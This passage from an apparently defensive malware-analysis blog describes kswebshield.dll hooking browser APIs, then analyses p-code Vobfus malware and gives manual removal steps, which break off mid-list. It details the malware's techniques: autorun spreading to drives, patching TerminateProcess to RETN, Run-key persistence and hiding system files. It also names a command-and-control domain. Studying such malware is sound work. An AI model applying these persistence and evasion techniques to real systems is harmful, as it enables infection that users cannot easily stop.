<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In this figure, kswebshield.dll is already injected to process memory of iexplore.exe and starts to load</span> <span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">http://www.hao144.info/1/.</span></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- also hooks the following list of APIs in order to route execution to itself:</span></div>
</div>
</div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">
</span></div>
<div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WS2_32.WSASend</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WS2_32.Send</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">NTDLL.ZwCreateProcessEx</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">NTDLL.ZwCreateProcess</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.HttpOpenRequestA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.HttpOpenRequestW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetConnectA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetConnectW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetReadFile</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetQueryDataAvailable</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetOpenUrlA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetOpenUrlW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">WININET.InternetCloseHandle</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CopyFileExA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CopyFileExW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CopyFileA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CopyFileW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.LoadLibraryA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.LoadLibraryW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.LoadLibraryExA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.LoadLibraryExW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CreateProcessInternalA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CreateProcessInternalW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CreateProcessW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.CreateProcessA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KERNEL32.WinExec</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLEAUT32.SysAllocStringByteLen</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLEAUT32.SysAllocStringLen</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SHELL32.ShellExecuteExA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SHELL32.ShellExecuteExW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLE32.CoGetClassObject</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLE32.CoRegisterClassObject</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">OLE32.CoCreateInstance</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SHLWAPI.SHRegGetUSValue</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">ADVAPI32.RegQueryValueExA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">ADVAPI32.RegQueryValueExW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">NSPR4.PR_LoadLibrary</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.CoGetClassObjectFromURL</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.URLDownloadToCacheFileA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.URLDownloadToCacheFileW</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.URLDownloadToFileA</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">URLMON.URLDownloadToFileW</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
</li>
</ul>
<div>
<span style="font-family: inherit; font-size: 15px; font-weight: normal; line-height: 17.25px; white-space: pre-wrap;"><br /></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigHuEhWys3mmRGnEa932sbzF7GtpCneAiNm7-PfUNrTz5A594c_vwpBZejIN1-SW6i9jiEQ_bJkS5oi1jjUmOghwsMpvyY7rYs1zU7eUYuFEIMi0KBZEIvFqIwzK6m7Fcbx6fm-Pbq/s1600/66.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigHuEhWys3mmRGnEa932sbzF7GtpCneAiNm7-PfUNrTz5A594c_vwpBZejIN1-SW6i9jiEQ_bJkS5oi1jjUmOghwsMpvyY7rYs1zU7eUYuFEIMi0KBZEIvFqIwzK6m7Fcbx6fm-Pbq/s1600/66.png" height="33" width="320" /></span></a></div>
<div>
<span style="font-family: inherit; font-size: 15px; font-weight: normal; line-height: 17.25px; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBVqMaxIbDrGqdgIp7v2uVPxvqVR7zk8vrOg1ltpou-xKhBUONTtruPeyo1FmuA7CQIWpb1ici0_Ulwg0oKRoyJKkOERtN-jG-L5Q4O_4D_k2w0PwNWNLDHqxgj-ENg4uhkzSFu5N4/s1600/77.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBVqMaxIbDrGqdgIp7v2uVPxvqVR7zk8vrOg1ltpou-xKhBUONTtruPeyo1FmuA7CQIWpb1ici0_Ulwg0oKRoyJKkOERtN-jG-L5Q4O_4D_k2w0PwNWNLDHqxgj-ENg4uhkzSFu5N4/s1600/77.png" height="86" width="320" /></span></a></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">
</span></div>
<div style="line-height: 1.15;">
<span style="font-family: inherit; font-size: 15px; font-weight: normal; line-height: 17px; text-align: -webkit-auto; white-space: pre-wrap;">Figure below demonstrates how hooking is done by replacing the first 5 bytes of the target API with a jump offset to the arbitrary code.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; font-size: 15px; font-weight: normal; line-height: 17px; text-align: -webkit-auto; white-space: pre-wrap;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9TS6bQEqqNhbK94e2ROTq1o81utGxZ2p__Ubg5a6kg3U1HiUcxMKhEDLwZGjYRkiV5zWY2XbddFcIH6_def0OtYK0i2Ws3t_rO5ABrkxNegQFQi3KMJWsquMyRx-_RZZibnkdph-D/s1600/88.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9TS6bQEqqNhbK94e2ROTq1o81utGxZ2p__Ubg5a6kg3U1HiUcxMKhEDLwZGjYRkiV5zWY2XbddFcIH6_def0OtYK0i2Ws3t_rO5ABrkxNegQFQi3KMJWsquMyRx-_RZZibnkdph-D/s1600/88.png" height="195" width="320" /></a></span></div>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; line-height: 17px; text-align: -webkit-auto; white-space: pre-wrap;">
</span></div>
</div>
<div dir="ltr" style="font-family: Tahoma; font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div class="separator" style="clear: both; font-family: Tahoma; line-height: 1.15; text-align: center;">
</div>
</div>
Anonymoushttp://www.blogger.com/profile/10653752703445056399noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-41075495317354744672014-05-01T19:59:00.000-07:002014-05-01T19:59:24.262-07:00PCode Vobfus Malware<h3>
<b><span style="font-family: inherit; font-size: large;">ANALYSIS</span></b></h3>
<div>
<div style="font-family: inherit;">
<span style="font-family: inherit;">This version of VOBFUS malware is compiled in <a href="http://en.wikipedia.org/wiki/Microsoft_P-Code" target="_blank">p-code</a> or pseudo code (also known as packed code). Since this is p-code compiled, technically the size of the malware file is smaller than the native compiled version of the malware. And since this version needs a p-code interpreter at runtime in order to interpret p-code instructions, debugging the malware using OllyDBG will prove to be quite demanding especially to users not familiar with these types of instructions. You may also use a p-code debugger called WKTVBDebugger which already interprets p-code instructions.</span></div>
<div style="font-family: inherit;">
<span style="font-family: inherit;"><br /></span></div>
<div style="font-family: inherit;">
<span style="font-family: inherit;">In order to debug this malware in OllyDBG, we need to breakpoint in MSVBVM60.DllFunctionCall to trap all windows API that the malware uses.</span></div>
<div style="font-family: inherit;">
<span style="font-family: inherit;"><br /></span></div>
<div style="font-family: inherit;">
<span style="font-family: inherit;">Usage of MSVBVM60.DllFunctionCall API is illustrated below.</span></div>
<div class="separator" style="clear: both; font-family: inherit; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLcpKA6ekT_TgK3WVy8BDr9NqIxtxXzuY410yOn1sHmJ4noQbpsayiRSCU1khqmo_aT79nOe8sKgTbuC6eiphtTYw5LkCDPcsgA0oYFSqnc2GnoeBiE1W3ikqt46qr3v__fmsyGzE/s1600/1st.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLcpKA6ekT_TgK3WVy8BDr9NqIxtxXzuY410yOn1sHmJ4noQbpsayiRSCU1khqmo_aT79nOe8sKgTbuC6eiphtTYw5LkCDPcsgA0oYFSqnc2GnoeBiE1W3ikqt46qr3v__fmsyGzE/s1600/1st.png" height="102" width="320" /></a></div>
<div style="font-family: inherit; font-weight: bold;">
<br /></div>
<div style="font-family: inherit;">
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">Upon execution, it will create a mutex with
string “A”.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">It will create a copy of itself as
%USERPROFILE%\<RandomFileName>.exe with file attributes as READONLY,
HIDDEN and SYSTEM. This copy will then be executed using USER32.ShellExecuteW.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">Next is it will attempt to establish a
connection to ns1.theimageparlour.net.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">It will also get a list of all available drives
in the system and checks for removable/shared drives. It will infect removable and
shared network drives by dropping multiple copies of itself and autorun.inf
with the following settings.</span><b style="font-family: Calibri, sans-serif; font-size: 11pt;"> </b></span></div>
<div class="separator" style="clear: both; font-family: inherit; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhf74oiKAKOhMXdOfDtVwEvz29BsCeVQZqY9fLRuVyxQmhuZEHLnoZYDo4XwyTjQxiEIMMrY-YLu_wvshd1bnYbHxRhgEQNLwcmcPIZOCzN0GCLEBYLXs2L_ijfiNdi0fI6sbiivlCu/s1600/2nd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhf74oiKAKOhMXdOfDtVwEvz29BsCeVQZqY9fLRuVyxQmhuZEHLnoZYDo4XwyTjQxiEIMMrY-YLu_wvshd1bnYbHxRhgEQNLwcmcPIZOCzN0GCLEBYLXs2L_ijfiNdi0fI6sbiivlCu/s1600/2nd.png" height="71" width="320" /></a></div>
<div>
<span lang="EN-US" style="font-family: inherit; line-height: 115%;"><span style="font-family: inherit;"><div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">This ensures automatic execution of the
malware when autorun feature is enabled in removable drives. Dropped files in
removable/shared drives are also set with attributes as READONLY, HIDDEN and
SYSTEM. It will also drop multiple shortcut links that points to the malware.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
</span></span><div style="font-family: inherit;">
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">Using CreateToolhelp32Snapshot, Process32First
and Process32Next APIs, it will traverse thru running processes and will
prevent users from manually closing the malware by hooking to TerminateProcess
and TerminateThread APIs and modifying it in memory so that when this APIs are
triggered, it will just do nothing. It does this by using WriteProcessMemory
API and replaces the first byte of TerminateProcess and TerminateThread API to
0xC3 (RETN).</span></span><span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"> </span></span></div>
<div class="separator" style="clear: both; font-family: inherit; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGJNlaxHw2H_XSrGyhdCXzQykZyhoDV-MghItpm3gdruu_a2uf_IORXm25Hqj77VPSScQp4Npmw6Jd3gI_pWWpWSSvtL4mVFyV7fD2WHNVJsuasj5yil2uA6Qv2HBE-0kuNJpjd5Hx/s1600/3rd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGJNlaxHw2H_XSrGyhdCXzQykZyhoDV-MghItpm3gdruu_a2uf_IORXm25Hqj77VPSScQp4Npmw6Jd3gI_pWWpWSSvtL4mVFyV7fD2WHNVJsuasj5yil2uA6Qv2HBE-0kuNJpjd5Hx/s1600/3rd.png" height="39" width="320" /></a></div>
<div style="font-family: inherit;">
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></span></div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">Unlike its native compiled vobfus counterpart that only modifies terminate-related-apis in processes with “task” or “proc” strings, this p-code version of vobfus has a list of processes to skip. Processes listed below will be skipped.</span></span><br />
<br />
<ul>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> taskmgr.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> explorer.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> svchost.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> winlogon.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> services.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> lsass.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> alg.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> csrss.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> smss.exes (Yes! This is not a typo)</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> spoolsv.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> firefox.exe</span></li>
</ul>
<br />
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">It then creates its REGRUN entry to ensure activation every system startup.</span></span><br />
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] “<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe. </span></span><br />
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">It will also set the folder settings to hide system files (files with properties set to SYSTEM) in order to conceal the malware away from easy inspection. It does this by modifying the registry [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] “ShowSuperHidden” = dword:00000000 (from dword:00000001).</span></span><br />
<span lang="EN-US"><span style="font-family: inherit;"><span lang="EN-US" style="line-height: 16.866666793823242px;"></span></span></span><br />
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">On a note, this malware changes the ProductName, FileVersion, ProductVersion, InternalName and OriginalFileName of every dropped copy of itself to avoid easy hash detection by AV vendors.</span></span></div>
<div style="font-family: inherit;">
<br /></div>
</div>
<h3>
<span style="font-family: inherit; font-size: large;">MANUAL REMEDIATION</span></h3>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">In order to successfully restore the
system, first and foremost is we have to find a way on how to kill the vobfus
malware running as a process. Remember that this version of vobfus has a
process list to skip (as stated above) in modifying TerminateProcess and TerminateThread.
Because of this, we can rename a copy of process explorer to explorer.exe in
order to fool the malware.<o:p></o:p></span></span></div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">To put it in steps:</span></span><br />
<div class="MsoListParagraphCxSpFirst" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">1.
</span><!--[endif]--><span lang="EN-US">Rename procexp.exe to explorer.exe.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">2.
</span><!--[endif]--><span lang="EN-US">Run explorer.exe (copy of
procexp.exe).<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">3.
</span><!--[endif]--><span lang="EN-US">Terminate vobfus malware in
memory.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">4.
</span><!--[endif]--><span lang="EN-US">Delete the following registry
entries using regedit:<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .75in; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">a.
</span><!--[endif]--><span lang="EN-US">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">5.
</span><!--[endif]--><span lang="EN-US">Modify the following registry
entry using regedit:<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .75in; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">a.
</span><!--[endif]--><span lang="EN-US">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ShowSuperHidden” = dword:00000000 (from dword:00000001 to see hidden system
files in explorer.)<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">6.
</span><!--[endif]--><span lang="EN-US">Manually delete copies of
malware found in %USERPROFILE%\<RandomFileName>.exe and removable/shared
